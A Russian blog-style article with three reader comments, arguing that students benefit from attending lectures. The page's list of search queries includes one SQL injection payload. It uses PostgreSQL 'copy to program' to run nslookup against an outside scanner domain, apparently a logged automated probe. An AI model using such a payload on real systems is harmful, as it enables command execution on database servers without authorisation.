Последние новости
Статьи /

Ходить ли на лекции

В наше время любой студент может найти предостаточно информации по определенному предмету. Источником этой информации может быть интернет, библиотека и даже друзья. Поэтому многие студенты пропускают лекции, утверждая, что сами могут подготовиться к экзамену. Но, на самом деле, ходить на лекции стоит. Почему?

Во-первых, многие из преподавателей отмечают посещаемость своих студентов и если ты не ходил на лекции, то на экзамене тебе это обязательно припомнят. При чем, даже если вы видите, что преподаватель не записывает учеников, которые пропустили занятия, вы не можете знать, запомнил он вас или нет. Человек с хорошей зрительной памятью может легко определить на экзамене тех, кто не бывал у него на лекциях.

Во-вторых, лекции существуют для того, чтобы вам легче было усвоить предмет. Здесь действует как зрительная, так и слуховая память. Когда вы готовитесь к экзамену исключительно по конспектам однокурсников, вы не можете быть уверены в том, что здесь записано все. А те вопросы, которые рассматривались на лекции, могут быть и на экзамене. Удачи!

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2120.1964.50c58.1.bxss.me
  • testing
  • почему на лекции обязательно ходить
  • тем кто ходит на лекции
  • сочинение зачем ходить на лекции
3 комментария
Kaxovka / 13 июля 2012 / 15:09
Если бы все было так просто, то лекции давно бы уже отменили. Пришел, сдал зачеты и экзамены и получил диплом. Но так не бывает - лекции - это то место где студент может наглядно увидеть изучаемый материал, дотронуться, задать интересующий вопрос. У компьютера или книги ведь ничего не спросишь и не уточнишь. Да и картинка на мониторе никак не оживет. Поэтому ребята - ходите на лекции.
astafon4ik / 14 июля 2012 / 14:05
На лекции ходить нужно обязательно. В интернете настолько много материала,что порой на ее поиск уходит уйма времени. Для некоторых людей проще запоминать информацию на слух, к тому же при конспектировании 30% текста вы уже заучили. Преподаватель на лекции дает вам то, что будет в последующем спрашивать на семинарах и экзаменах, а в интернете вы можете упустить что-то важное для вас. Лично я всегда хожу на лекции для того,чтобы узнать тему и основные вопросы,которые будут ставиться на занятии, а в других источниках черпаю дополнительную информацию для более полного ответа и для самообразования.
Burabay / 6 января 2013 / 18:24
На лекции ходить просто необходимо.Во-первых: проверено на себе чем больше прогулов, тем больше будет мучить преподаватель на зачёте или экзамене, во-вторых на занятиях можно узнать действительно много интересного и полезного (не на всех, но на многих). В третьих часто бывает так, что с лекции может что-нибудь запомнится и в дальнейшем пригодится на экзамене.
имя


Популярые сообщения